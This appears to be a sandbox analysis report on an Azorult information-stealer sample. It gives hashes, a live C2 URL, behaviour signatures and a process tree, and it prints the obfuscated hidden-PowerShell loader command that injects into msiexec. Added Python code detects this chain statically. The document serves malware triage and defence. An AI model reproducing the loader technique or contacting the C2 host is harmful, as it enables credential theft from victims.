Analysis
max time kernel: 94s
max time network: 144s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64 arch:x86 image:win10v2004-20241007-en locale:en-us os:windows10-2004-x64 system
submitted: 16/01/2025, 03:07
Static task: static1
Behavioral task: behavioral1
  Sample: 8f856e9882d312f6a51f265796c6a68c1914d1c51c59fc1964484fa5ac130f34.exe
  Resource: win7-20240729-en
Behavioral task: behavioral2
  Sample: 8f856e9882d312f6a51f265796c6a68c1914d1c51c59fc1964484fa5ac130f34.exe
  Resource: win10v2004-20241007-en
Behavioral task: behavioral3
  Sample: $PLUGINSDIR/nsExec.dll
  Resource: win7-20240903-en
Behavioral task: behavioral4
  Sample: $PLUGINSDIR/nsExec.dll
  Resource: win10v2004-20241007-en
General
Target: 8f856e9882d312f6a51f265796c6a68c1914d1c51c59fc1964484fa5ac130f34.exe
Size: 941KB
MD5: ab99e49a4471901468bbbd9ccf228de0
SHA1: 2b7302e1b24a9994e2924e97e627c1f5de23eaaa
SHA256: 8f856e9882d312f6a51f265796c6a68c1914d1c51c59fc1964484fa5ac130f34
SHA512: bcda816d71aab2b798ed2d2764099eea01ce51c9a276377a0d5ca3aed4aaf328d700204dbbc8539d16eb70529d390d7113e7700c98652caa4512c2979ef9313c
SSDEEP: 24576:YuA8/BOypdAGTekMh6RJNBIQll+hQT2jiux5A:+IBOypdAGTRrRFIQlluQsxq
Malware Config
Extracted config
  Family: azorult
  C2 URL: http://b2csa.icu/PL341/index.php
Signatures
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
Azorult family
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Runs PowerShell with its display window hidden (-windowstyle hidden).
pid   Process
4448  powershell.exe
Loads dropped DLL 1 IoCs
pid   Process
2412  8f856e9882d312f6a51f265796c6a68c1914d1c51c59fc1964484fa5ac130f34.exe
Blocklisted process makes network request 2 IoCs
flow  pid   Process
22    4432  msiexec.exe
24    4432  msiexec.exe
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid   Process
4432  msiexec.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid   Process
4448  powershell.exe
4432  msiexec.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description  ioc                                                      Process
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  8f856e9882d312f6a51f265796c6a68c1914d1c51c59fc1964484fa5ac130f34.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  msiexec.exe
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid   Process
4448  powershell.exe
4448  powershell.exe
4448  powershell.exe
4448  powershell.exe
4448  powershell.exe
4448  powershell.exe
4448  powershell.exe
4448  powershell.exe
4448  powershell.exe
Suspicious behavior: MapViewOfSection 1 IoCs
pid   Process
4448  powershell.exe
Suspicious use of AdjustPrivilegeToken 22 IoCs
description                           pid   Process
Token: SeDebugPrivilege               4448  powershell.exe
Token: SeIncreaseQuotaPrivilege       4448  powershell.exe
Token: SeSecurityPrivilege            4448  powershell.exe
Token: SeTakeOwnershipPrivilege       4448  powershell.exe
Token: SeLoadDriverPrivilege          4448  powershell.exe
Token: SeSystemProfilePrivilege       4448  powershell.exe
Token: SeSystemtimePrivilege          4448  powershell.exe
Token: SeProfSingleProcessPrivilege   4448  powershell.exe
Token: SeIncBasePriorityPrivilege     4448  powershell.exe
Token: SeCreatePagefilePrivilege      4448  powershell.exe
Token: SeBackupPrivilege              4448  powershell.exe
Token: SeRestorePrivilege             4448  powershell.exe
Token: SeShutdownPrivilege            4448  powershell.exe
Token: SeDebugPrivilege               4448  powershell.exe
Token: SeSystemEnvironmentPrivilege   4448  powershell.exe
Token: SeRemoteShutdownPrivilege      4448  powershell.exe
Token: SeUndockPrivilege              4448  powershell.exe
Token: SeManageVolumePrivilege        4448  powershell.exe
Token: 33                             4448  powershell.exe
Token: 34                             4448  powershell.exe
Token: 35                             4448  powershell.exe
Token: 36                             4448  powershell.exe
Suspicious use of WriteProcessMemory 7 IoCs
description                        pid   Process                                                                  procid_target
PID 2412 wrote to memory of 4448   2412  8f856e9882d312f6a51f265796c6a68c1914d1c51c59fc1964484fa5ac130f34.exe  82
PID 2412 wrote to memory of 4448   2412  8f856e9882d312f6a51f265796c6a68c1914d1c51c59fc1964484fa5ac130f34.exe  82
PID 2412 wrote to memory of 4448   2412  8f856e9882d312f6a51f265796c6a68c1914d1c51c59fc1964484fa5ac130f34.exe  82
PID 4448 wrote to memory of 4432   4448  powershell.exe                                                           91
PID 4448 wrote to memory of 4432   4448  powershell.exe                                                           91
PID 4448 wrote to memory of 4432   4448  powershell.exe                                                           91
PID 4448 wrote to memory of 4432   4448  powershell.exe                                                           91
Processes
[1] C:\Users\Admin\AppData\Local\Temp\8f856e9882d312f6a51f265796c6a68c1914d1c51c59fc1964484fa5ac130f34.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\8f856e9882d312f6a51f265796c6a68c1914d1c51c59fc1964484fa5ac130f34.exe"
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID: 2412
  [2] child of [1]: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell.exe -windowstyle hidden "$Omrystede=gc -raw 'C:\Users\Admin\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne\Kreditformidlernes67.hve';$Advancement=$Omrystede.SubString(71452,3);.$Advancement($Omrystede) "
      - Command and Scripting Interpreter: PowerShell
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: MapViewOfSection
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 4448
    [3] child of [2]: C:\Windows\SysWOW64\msiexec.exe
        Command line: "C:\Windows\SysWOW64\msiexec.exe"
        - Blocklisted process makes network request
        - Suspicious use of NtCreateThreadExHideFromDebugger
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - System Location Discovery: System Language Discovery
        PID: 4432
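The process tree above is the part of this report worth turning into reusable triage logic: the dropped executable starts a hidden PowerShell that reads a script body from a file with `gc -raw`, pulls a three-character substring out of it at offset 71452 to use as the operator (`.$Advancement($Omrystede)`), and that PowerShell then spawns an argument-less msiexec.exe which is the process that actually talks to the network. The following Python is an added example written for this page, not code from tria.ge or from the sample. It parses the loader command line statically to recover the script path and the substring offset, replicates the `SubString` call on the blob without executing anything, and flags the parent/child chain from a list of process-creation events. The events are constructed from the PIDs and command lines shown in the report (the parent PID of 2412 is not on the page, so 0 is a placeholder); the `.hve` file itself is not in the report, so a constructed stand-in with "iex" at the expected offset is used, and the real operator token is an assumption.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Loader shape seen in this report: gc -raw '<file>' ... .SubString(<offset>,<len>) ...
LOADER_RE = re.compile(
    r"gc\s+-raw\s+'(?P<path>[^']+)'.*?\.SubString\((?P<offset>\d+)\s*,\s*(?P<length>\d+)\)",
    re.IGNORECASE,
)

# Operator names an attacker pulls out of a blob to execute it. Assumption: the
# token actually at offset 71452 is not shown in the report.
SUSPICIOUS_OPERATORS = {"iex", "invoke-expression", "sal", "icm", "invoke-command"}


@dataclass
class LoaderInfo:
    path: str
    offset: int
    length: int


def parse_loader(cmdline: str) -> Optional[LoaderInfo]:
    """Extract the script path and SubString(offset, length) from the PowerShell command line."""
    m = LOADER_RE.search(cmdline)
    if not m:
        return None
    return LoaderInfo(m["path"], int(m["offset"]), int(m["length"]))


def recover_operator(blob: str, info: LoaderInfo) -> str:
    """Replicate $x.SubString(offset, length) statically; nothing is executed."""
    if info.offset + info.length > len(blob):
        raise ValueError("blob shorter than the offset the loader expects: wrong or truncated file")
    return blob[info.offset:info.offset + info.length]


def is_hidden_loader(cmdline: str) -> bool:
    return "-windowstyle hidden" in cmdline.lower() and parse_loader(cmdline) is not None


def flag_chain(events):
    """Flag the chain from the report. events: dicts with pid, ppid, image, cmdline."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        image = e["image"].lower()
        parent = by_pid.get(e["ppid"])
        if image.endswith("powershell.exe") and is_hidden_loader(e["cmdline"]):
            findings.append((e["pid"], "hidden PowerShell loader invoking a substring of a file as an operator"))
        if image.endswith("msiexec.exe") and parent and parent["image"].lower().endswith("powershell.exe"):
            bare = e["cmdline"].strip().strip('"').lower()
            # A real install passes /i, /x, /package ...; a bare image path launched by
            # PowerShell is an injection target, not an installer run.
            if bare.endswith("msiexec.exe"):
                findings.append((e["pid"], "argument-less msiexec.exe spawned by PowerShell: injection target"))
    return findings


# Constructed from the report's process tree; ppid 0 for the root is a placeholder.
POWERSHELL_CMDLINE = r'''powershell.exe -windowstyle hidden "$Omrystede=gc -raw 'C:\Users\Admin\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne\Kreditformidlernes67.hve';$Advancement=$Omrystede.SubString(71452,3);.$Advancement($Omrystede) "'''

EVENTS = [
    {"pid": 2412, "ppid": 0, "image": r"C:\Users\Admin\AppData\Local\Temp\8f856e9882d312f6a51f265796c6a68c1914d1c51c59fc1964484fa5ac130f34.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Local\Temp\8f856e9882d312f6a51f265796c6a68c1914d1c51c59fc1964484fa5ac130f34.exe"'},
    {"pid": 4448, "ppid": 2412, "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe", "cmdline": POWERSHELL_CMDLINE},
    {"pid": 4432, "ppid": 4448, "image": r"C:\Windows\SysWOW64\msiexec.exe", "cmdline": r'"C:\Windows\SysWOW64\msiexec.exe"'},
]

# Constructed stand-in for the .hve blob (not in the report): filler with "iex" at offset 71452.
SAMPLE_BLOB = "A" * 71452 + "iex" + "B" * 128

if __name__ == "__main__":
    info = parse_loader(POWERSHELL_CMDLINE)
    op = recover_operator(SAMPLE_BLOB, info)
    print(f"script: {info.path}")
    print(f"operator at {info.offset}: {op!r} suspicious={op.lower() in SUSPICIOUS_OPERATORS}")
    for pid, why in flag_chain(EVENTS):
        print(pid, why)
```

On a real case, feed `recover_operator` the dropped `.hve` file read as text with the same encoding PowerShell would use (`gc -raw` is character-indexed, so byte offsets and character offsets diverge on non-ASCII content); if the token is `iex` the rest of the blob is the next stage and can be dumped for analysis without running it.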
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 69KB
MD5: dcd80eb1ad2e5394274ffdce163d4815
SHA1: f409bb772f6fcace2ae9505dbf1764186178158f
SHA256: 16743054909c0b954adece9179b026560c1671db30e2cb397ddc4c3742c57bc4
SHA512: 8fa32c316430db3e59401add31221f2b46ef56732f1cbe8d02576cb140163b189b7effc43223f3f59de80bd936231b1032a4673980be7653ebe647e9ebaa1ed5

Filesize: 351KB
MD5: 9cae95341fee19c573b15cdeba15077b
SHA1: 91cd113b2ff21cc6a1c2b11d0812080b61c6cb68
SHA256: 9cb1a6246f58400eb6c3319e2ca0524bd8392fa23e727439706dc77f7f021ee5
SHA512: 92464c29b5f4f652622c9b5ee74bfe706cbc3335892461c44effcf82902d7a4de5087c8d00724f6900f23f9d7ac8e3b990c82bd784e6ff8f1525940f55fe57c2

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize: 6KB
MD5: 51e63a9c5d6d230ef1c421b2eccd45dc
SHA1: c499cdad5c613d71ed3f7e93360f1bbc5748c45d
SHA256: cd8496a3802378391ec425dec424a14f5d30e242f192ec4eb022d767f9a2480f
SHA512: c23d713c3c834b3397c2a199490aed28f28d21f5781205c24df5e1e32365985c8a55be58f06979df09222740ffa51f4da764ebc3d912cd0c9d56ab6a33cab522